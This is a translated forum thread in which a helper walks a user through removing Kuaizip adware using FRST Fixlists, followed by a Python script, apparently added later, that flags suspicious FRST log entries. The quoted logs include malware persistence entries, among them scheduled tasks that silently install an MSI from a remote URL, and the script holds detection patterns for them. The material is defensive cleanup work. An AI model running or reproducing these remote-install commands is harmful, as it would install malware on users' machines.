Elektroda.pl

- Kuaizip Malware Problem: FRST Script Needed

Htpp 07 Feb 2017 00:19 735 5
  • #1 07 Feb 2017 00:19
    Htpp
    Level 5

    Hi. I downloaded some crappy file, and after opening it, it started installing some Chinese program called Kuaizip, which installs junk programs and generally slows the computer down. A folder named żěŃą was created in C:\Program Files which I can't delete ("Cannot delete because the folder or file is open in another program"). I tried various anti-malware programs etc., including Kaspersky Removal Tool, CCleaner and AdwCleaner; they found and removed something, but it's always the same. Every time I run AdwCleaner, for example, it detects something. I don't know how to get rid of this junk, any ideas? And a second question: which antivirus do you recommend for a Core 2 Duo 2.2 GHz, 2 GB RAM, so that it doesn't slow the PC down?

  • #2 07 Feb 2017 00:20
    Kolobos
    Computer specialist

    Post the required logs, and in future read the pinned threads and the other threads in the section you're posting in!

  • #3 07 Feb 2017 00:37
    Htpp
    Level 5

    Kolobos wrote:
    Post the required logs, and in future read the pinned threads and the other threads in the section you're posting in!


    Fixed, I added the FRST logs.

  • Helpful post
    #4 07 Feb 2017 00:59
    Kolobos
    Computer specialist

    Did you infect the system by running the contents of C:\Users\Buli\Downloads\office 2016.zip? Delete that file.

    Uninstall: amuleC

    Next to frst.exe, create a file named Fixlist.txt with this content:
    Traffic Exchange (x32 Version: 2.0.0 - Microleaves) Hidden <==== UWAGA

    In FRST, choose Fix.

    Once that is done, uninstall Traffic Exchange.

    In Chrome's settings, remove the option that restores a set of pages when the browser starts.

    Create another Fixlist.txt:
    Task: {11871EF7-0952-4983-BB60-17D7369F34BD} - System32\Tasks\Zazshzerfertain => /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel....00418AS_9VMKDFJSXXXX9VMKDFJS&amp;v=201724 /q
    Task: {2081EF89-604F-4305-B931-316263B82A1B} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: {274410E0-2584-4BD8-9C89-5FD746E4091A} - System32\Tasks\Cherperksterrot Engine => C:\Program Files (x86)\Cizeck\plubapy.exe [2017-02-04] (Glarysoft Ltd)
    Task: {45C8EE02-693D-4FAC-BB72-E5A2EA4F79DC} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: {613DAB15-BBCC-47F1-BACD-7C4E4EB8A360} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    2017-02-04 19:53 - 2017-02-04 19:53 - 00524696 _____ () C:\Program Files\żěŃą\X64\KZipShell.dll
    2017-02-06 11:02 - 2017-02-06 09:33 - 00116736 _____ () c:\program files (x86)\gub\gubzl.dll
    2017-02-04 19:54 - 2017-02-04 19:54 - 00149504 _____ () c:\program files (x86)\cizeck\terqutcmm.dll
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37962243.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37962243.sys => ""="Driver"
    HKU\S-1-5-18\...\Run: [] => 0
    HKLM\...\Providers\k0agg4el: C:\Program Files (x86)\Cherperksterrot Engine\local64spl.dll
    ShellExecuteHooks: Brak nazwy - {8DA1928A-DE4A-11E6-BFAC-64006A5CFC23} - -> Brak pliku
    ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-02-04] ()
    CHR StartupUrls: Profile 1 -> "hxxp://otomoto.pl/osobowe","hxxp://www.motogratka.pl/","hxxp://www.olx.pl/","hxxp://www.ogloszenia.cmg24.pl/index.php?kat=21&d=1","hxxp://allegro.pl/","hxxp://www.amisites.com/?type=hp&ts=1486375381&z=193c77b4e0278d15e42a966gezabfq3c6maw4c8b9g&from=che0812&uid=ST3500418AS_9VMKDFJSXXXX9VMKDFJS"
    CHR DefaultSearchURL: Profile 1 -> hxxp://www.amisites.com/search/?type=ds&t...p;uid=ST3500418AS_9VMKDFJSXXXX9VMKDFJS&q={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> amisites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    R2 GubZL; C:\Program Files (x86)\Gub\GubZL.dll [116736 2017-02-06] () [Brak podpisu cyfrowego]
    R2 Ralerly; C:\Program Files (x86)\Cizeck\TerqutCmm.dll [149504 2017-02-04] () [Brak podpisu cyfrowego]
    2017-02-06 21:51 - 2017-02-06 22:54 - 00000000 ____D C:\Program Files\WiperSoft
    2017-02-06 21:48 - 2017-02-06 21:49 - 01944616 _____ (WiperSoft) C:\Users\Buli\Downloads\WiperSoft-installer.exe
    2017-02-06 11:02 - 2017-02-06 11:02 - 00000000 ____D C:\Program Files (x86)\Gub
    2017-02-06 11:02 - 2017-02-06 11:02 - 00000000 ____D C:\Program Files (x86)\amuleCe
    2017-02-05 09:57 - 2017-02-05 09:57 - 00000000 ____D C:\Program Files (x86)\k0agg4el
    2017-02-04 22:52 - 2017-02-04 22:52 - 00000000 _____ C:\autoexec.bat
    2017-02-04 22:20 - 2017-02-04 22:20 - 03516080 _____ (Enigma Software Group USA, LLC.) C:\Users\Buli\Downloads\SpyHunter-Installer.exe
    2017-02-04 20:12 - 2017-02-06 23:01 - 00000000 ____D C:\AdwCleaner
    2017-02-04 19:55 - 2017-02-04 19:55 - 00003672 _____ C:\Windows\System32\Tasks\Zazshzerfertain
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\Avira
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\Avg
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-02-04 19:54 - 2017-02-05 14:25 - 00000000 ____D C:\Program Files (x86)\Cizeck
    2017-02-04 19:54 - 2017-02-05 14:25 - 00000000 ____D C:\Program Files (x86)\Cherperksterrot Engine
    2017-02-04 19:54 - 2017-02-04 20:28 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Ckeose
    2017-02-04 19:54 - 2017-02-04 19:55 - 00000000 ____D C:\Users\Buli\AppData\Local\Lgicavly
    2017-02-04 19:54 - 2017-02-04 19:54 - 00005980 _____ C:\Windows\System32\Tasks\Cherperksterrot Engine
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 3.job
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 2.job
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 1.job
    2017-02-04 19:52 - 2017-02-05 00:04 - 00000000 ____D C:\Program Files\żěŃą
    2017-02-04 19:52 - 2017-02-04 19:55 - 00000000 ____D C:\Program Files (x86)\Maoha
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 3
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 2
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 1
    2017-02-04 19:52 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Buli\AppData\Roaming\UCChannel
    2017-02-04 19:51 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-02-04 19:51 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
    EmptyTemp:

    In FRST, choose Fix.

    Delete the C:\FRST folder and that's all.

  • Helpful post
    #6 19 Feb 2017 21:53
    Kolobos
    Computer specialist

    Back up your Chrome bookmarks; the profile created by the infection will be deleted.

    Run the Fixlist.txt below in Safe Mode.

    Fixlist:
    CloseProcesses:
    Task: {05D072C6-BE50-44C8-9FBE-445EAC36E5D1} - System32\Tasks\KuaiZip_Update => C:\Program Files\żěŃą\X86\Update.exe [2017-02-19] (Shanghai Guangle Network Technology Ltd) <==== UWAGA
    Task: {05D777F3-D040-45A4-9506-B63BC2770D41} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== UWAGA
    Task: {23BA52EF-E15F-490C-8AC5-F5C1563DDC75} - System32\Tasks\RunBoosterUpdateTask => C:\Program Files\RunBooster\RunBoosterUpdateTask64.exe [2017-02-19] (SkyNET Corporation) <==== UWAGA
    Task: {3A425A2D-3B92-4DB1-BE00-2E8DD7E6D123} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-19] (UC Web Inc.) <==== UWAGA
    Task: {4646A6AB-8AFF-4433-917E-D6674F2F8978} - System32\Tasks\Atowerpyplowat => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel....0418AS_9VMKDFJSXXXX9VMKDFJS&amp;v=2017219 /q
    Task: {49D03185-822D-439A-8BF0-2ABAD715C75A} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
    Task: {64978C9C-50A6-40C9-8B85-C24D3DAFA719} - System32\Tasks\Jernercult Verfier => C:\Program Files (x86)\Naqodomvohs\phierk.exe [2017-02-19] (Glarysoft Ltd)
    Task: {DFA58248-8291-4347-A785-C49670B9A80D} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== UWAGA
    Task: {FBBBB6FC-1C1F-444B-811F-BED50F017624} - System32\Tasks\{5283E72E-E1FB-46F0-BFFA-F06AE450C4D2} => pcalua.exe -a "C:\Program Files (x86)\Maoha\MaohaAP\Uninstall.exe"
    Task: {FE081ACD-9133-4BA2-BCB0-2A89BD11DE2E} - System32\Tasks\osTip => Chrome.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    2017-02-19 21:10 - 2017-02-19 21:10 - 00145408 _____ () C:\Program Files (x86)\Naqodomvohs\Reomotain.dll
    2017-02-19 21:10 - 2017-02-19 21:10 - 00524696 _____ () C:\Program Files\żěŃą\X64\KZipShell.dll
    2017-02-19 21:09 - 2017-02-19 21:09 - 01737728 _____ () C:\Windows\Temp\2B46.tmp
    2017-02-19 21:09 - 2017-02-19 21:09 - 00394240 _____ () C:\Windows\Temp\2B3F.tmp
    2017-02-19 21:09 - 2016-08-25 16:24 - 03441664 _____ () C:\Users\Buli\AppData\Local\Temp\is-I6FL5.tmp\AutoTime.exe
    2017-02-19 21:09 - 2017-02-19 21:09 - 02072064 _____ () C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe
    2017-02-19 21:11 - 2017-02-19 19:10 - 00313344 _____ () C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe
    2017-02-19 21:11 - 2017-02-15 18:40 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    2017-02-19 21:11 - 2017-02-19 21:11 - 00393728 _____ () C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp
    2017-02-19 21:11 - 2017-02-19 21:11 - 00030208 _____ () C:\Program Files\RunBooster\WinDivert.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 02149136 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
    2017-02-19 21:10 - 2017-02-19 21:10 - 00219032 _____ () c:\program files\żěńą\x86\kuaizipupdatechecker.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 00508688 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libmp3lame.DLL
    2017-02-19 21:11 - 2017-02-15 18:40 - 01715472 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libglesv2.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 00087312 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libegl.dll
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1214242]
    Hosts:
    () C:\Windows\Temp\2B46.tmp
    () C:\Windows\Temp\2B3F.tmp
    () C:\Users\Buli\AppData\Local\Temp\is-I6FL5.tmp\AutoTime.exe
    () C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe
    () C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe
    () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    () C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp
    (SkyNET Corporation) C:\Program Files\RunBooster\RunBoosterService64.exe
    (UCWeb Inc.) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
    HKU\S-1-5-21-800759064-2579545316-1945446508-1000\...\Run: [msiql] => C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe [2072064 2017-02-19] () <===== UWAGA
    HKU\S-1-5-21-800759064-2579545316-1945446508-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\Chrome.exe [7288832 2017-02-16] ()
    ShellExecuteHooks: Brak nazwy - {19B5BEEC-F444-11E6-83B9-64006A5CFC23} - C:\Program Files (x86)\Naqodomvohs\Reomotain.dll [145408 2017-02-19] ()
    ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-02-19] ()
    Tcpip\..\Interfaces\{0D5DB575-E171-4CE3-956F-5C9F1CC53BE8}: [NameServer] 82.163.142.8,95.211.158.136
    CHR DefaultSearchURL: Profile 1 -> file://C:\\Users\\Buli\\AppData\\Local\\Temp\\23F0.html?bn=gch&ch_id=WAYSJ1H9&g=01a67563-1e59-4f0a-87f4-972a12af4e9c&p={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> yahoo.com
    CHR Profile: C:\Users\Buli\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-19] <==== UWAGA
    C:\Users\Buli\AppData\Local\Google\Chrome\User Data\ChromeDefaultData
    S2 GoogleChromeUpService; C:\ProgramData\service.exe [1620992 2017-02-19] () [Brak podpisu cyfrowego] <==== UWAGA
    R2 KuaizipUpdateChecker; C:\Program Files\żěŃą\X86\kuaizipUpdateChecker.dll [219032 2017-02-19] ()
    R2 LdvipMPGX5ye Updater; C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe [313344 2017-02-19] () [Brak podpisu cyfrowego]
    R2 RunBooster; C:\Program Files\RunBooster\RunBoosterService64.exe [286720 2017-02-19] (SkyNET Corporation) [Brak podpisu cyfrowego] <==== UWAGA
    R2 serverss; C:\Windows\Temp\2B3F.tmp [394240 2017-02-19] () [Brak podpisu cyfrowego]
    R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-02-15] ()
    R2 zitiqoru; C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp [393728 2017-02-19] () [Brak podpisu cyfrowego]
    R2 KuaiZipDrive; C:\Windows\system32\drivers\KuaiZipDrive.sys [92832 2017-02-19] (WinMount International Inc)
    U1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== UWAGA
    R2 WinDivert1.2; C:\Windows\system32\drivers\WinDivert64.sys [37552 2017-02-19] (Basil)
    2017-02-19 21:14 - 2017-02-19 21:14 - 00003106 _____ C:\Windows\System32\Tasks\{5283E72E-E1FB-46F0-BFFA-F06AE450C4D2}
    2017-02-19 21:14 - 2017-02-19 21:14 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Threrythecicult
    2017-02-19 21:12 - 2017-02-19 21:14 - 00000000 ____D C:\Users\Buli\AppData\Local\app
    2017-02-19 21:11 - 2017-02-19 21:21 - 00002552 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-02-19 21:11 - 2017-02-19 21:21 - 00000454 _____ C:\Windows\Tasks\UCBrowserUpdater.job
    2017-02-19 21:11 - 2017-02-19 21:21 - 00000290 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-02-19 21:11 - 2017-02-19 21:11 - 00037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys
    2017-02-19 21:11 - 2017-02-19 21:11 - 00004272 _____ C:\Windows\System32\Tasks\RunBoosterUpdateTask
    2017-02-19 21:11 - 2017-02-19 21:11 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-02-19 21:11 - 2017-02-19 21:11 - 00003426 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
    2017-02-19 21:11 - 2017-02-19 21:11 - 00002924 _____ C:\Windows\System32\Tasks\osTip
    2017-02-19 21:11 - 2017-02-19 21:11 - 00001522 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC浏览器.lnk
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Users\Buli\AppData\Local\UCBrowser
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Users\Buli\AppData\Local\Chromium
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC浏览器
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files\RunBooster
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\LdvipMPGX5ye Updater
    2017-02-19 21:10 - 2017-02-19 21:23 - 00000000 ____D C:\Users\Buli\AppData\Roaming\KuaiZip
    2017-02-19 21:10 - 2017-02-19 21:14 - 00000000 ____D C:\Program Files (x86)\Maoha
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 __SHD C:\ProgramData\WindowsMsg
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\Naqodomvohs
    2017-02-19 21:10 - 2017-02-19 21:10 - 00092832 _____ (WinMount International Inc) C:\Windows\system32\Drivers\KuaiZipDrive.sys
    2017-02-19 21:10 - 2017-02-19 21:10 - 00006002 _____ C:\Windows\System32\Tasks\Jernercult Verfier
    2017-02-19 21:10 - 2017-02-19 21:10 - 00003382 _____ C:\Windows\System32\Tasks\KuaiZip_Update
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000837 _____ C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\żěŃą.lnk
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 __SHD C:\Users\Buli\AppData\Local\svchost
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Softlink
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Users\Buli\AppData\Local\Bijlyirerge
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Program Files\żěŃą
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Program Files (x86)\Jernercult Verfier
    2017-02-19 21:09 - 2017-02-19 21:14 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
    2017-02-19 21:09 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970
    2017-02-19 21:09 - 2017-02-19 21:09 - 01620992 _____ C:\ProgramData\service.exe
    2017-02-19 21:09 - 2017-02-19 21:09 - 00005064 _____ C:\Windows\System32\Tasks\Atowerpyplowat
    2017-02-19 21:09 - 2017-02-19 21:09 - 00000000 ____D C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
    2017-02-19 21:09 - 2017-02-19 21:09 - 00000000 _____ C:\TOSTACK
    2017-02-07 18:56 - 2017-02-07 19:09 - 00000000 ____D C:\AdwCleaner
    2017-02-07 09:26 - 2017-02-07 09:26 - 00000000 ____D C:\Users\Buli\AppData\Local\AdvinstAnalytics
    2017-02-19 21:09 - 2017-02-19 21:09 - 1620992 _____ () C:\ProgramData\service.exe
    C:\ProgramData\service.exe
    EmptyTemp:

    Do a full scan with MBAM and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    and http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    When you're done, post new FRST logs from a scan.

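To show what the FRST entries in the two Fixlists above have in common, here is an added triage helper (example code written for this thread, not part of FRST and not Kolobos's own procedure) that scans FRST-style log lines for the persistence patterns the helper marked, explains why each one was flagged, and lays the hits out in Fixlist order. Assumed: the log comes from the Polish FRST build, so `[Brak podpisu cyfrowego]` and `<==== UWAGA` are its no-signature and attention markers; the sample lines are copied from the posts above, and the names `classify`, `triage` and `draft_fixlist` are this example's own.

```python
import re

# Added triage helper for this thread (not part of FRST or of the posts above).
# Markers assumed from the Polish FRST build quoted in the thread:
UNSIGNED = "[Brak podpisu cyfrowego]"        # "no digital signature"
ATTENTION = "<==== UWAGA"                    # FRST's own attention marker
USER_WRITABLE = ("\\programdata\\", "\\temp\\", "\\appdata\\")
SERVICE_RE = re.compile(r"^[RSU]\d\s+[^;]+;\s")                    # "R2 name; C:\path"
REMOTE_MSI_RE = re.compile(r"/i\s+h(?:xx|tt)ps?://")               # msiexec /i <url>
URL_ARG_RE = re.compile(r"-> h(?:xx|tt)ps?://")                    # .lnk opens a URL
ADS_RE = re.compile(r"[a-z]:\\[^:]*:[\w.-]+\.(?:sys|exe|dll)\b")   # ...\drivers:x.sys

# Sample input: lines copied from the FRST excerpts in the posts above.
SAMPLE = r"""
Task: {4646A6AB-8AFF-4433-917E-D6674F2F8978} - System32\Tasks\Atowerpyplowat => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel....0418AS_9VMKDFJSXXXX9VMKDFJS&amp;v=2017219 /q
Task: {49D03185-822D-439A-8BF0-2ABAD715C75A} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
S2 GoogleChromeUpService; C:\ProgramData\service.exe [1620992 2017-02-19] () [Brak podpisu cyfrowego] <==== UWAGA
R2 KuaiZipDrive; C:\Windows\system32\drivers\KuaiZipDrive.sys [92832 2017-02-19] (WinMount International Inc)
HKU\S-1-5-21-800759064-2579545316-1945446508-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\Chrome.exe [7288832 2017-02-16] ()
CHR DefaultSearchURL: Profile 1 -> file://C:\\Users\\Buli\\AppData\\Local\\Temp\\23F0.html?bn=gch&ch_id=WAYSJ1H9&g=01a67563-1e59-4f0a-87f4-972a12af4e9c&p={searchTerms}
Tcpip\..\Interfaces\{0D5DB575-E171-4CE3-956F-5C9F1CC53BE8}: [NameServer] 82.163.142.8,95.211.158.136
AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
"""


def classify(line):
    """Reasons (possibly none) one FRST line deserves a closer look."""
    low, reasons = line.lower(), []
    in_writable = any(d in low for d in USER_WRITABLE)
    if ATTENTION in line:
        reasons.append("flagged by FRST itself")
    if line.startswith("Task:") and "msiexec" in low and REMOTE_MSI_RE.search(low):
        reasons.append("scheduled task installs an MSI from a remote URL")
    if line.startswith("ShortcutWithArgument:") and ("--load-extension=" in low or URL_ARG_RE.search(low)):
        reasons.append("browser shortcut forced to load an extension or open a URL")
    if SERVICE_RE.match(line) and (UNSIGNED in line or "()" in line) and in_writable:
        reasons.append("unsigned service running from a user-writable directory")
    if "\\...\\Run:" in line and in_writable:
        reasons.append("Run key autostart from a user-writable directory")
    if line.startswith("CHR DefaultSearchURL:") and "file://" in low:
        reasons.append("default search redirected to a local file")
    if "[NameServer]" in line:
        reasons.append("DNS resolver override on an interface; compare with the expected resolvers")
    if ADS_RE.search(low):
        reasons.append("binary stored in an NTFS alternate data stream")
    return reasons


def triage(log_text):
    """(line, reasons) for every non-blank line that trips at least one rule."""
    hits = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if line and (reasons := classify(line)):
            hits.append((line, reasons))
    return hits


def draft_fixlist(log_text):
    """Flagged lines laid out as the thread's Fixlists are: CloseProcesses: first,
    the FRST entries verbatim, EmptyTemp: last. A draft for manual review."""
    return "\n".join(["CloseProcesses:", *(ln for ln, _ in triage(log_text)), "EmptyTemp:"])
```

Run `triage(SAMPLE)` to see that the GridinSoft task and the signed KuaiZipDrive driver stay out while the other seven lines are flagged, and `draft_fixlist(SAMPLE)` to get them in the order the posts above use.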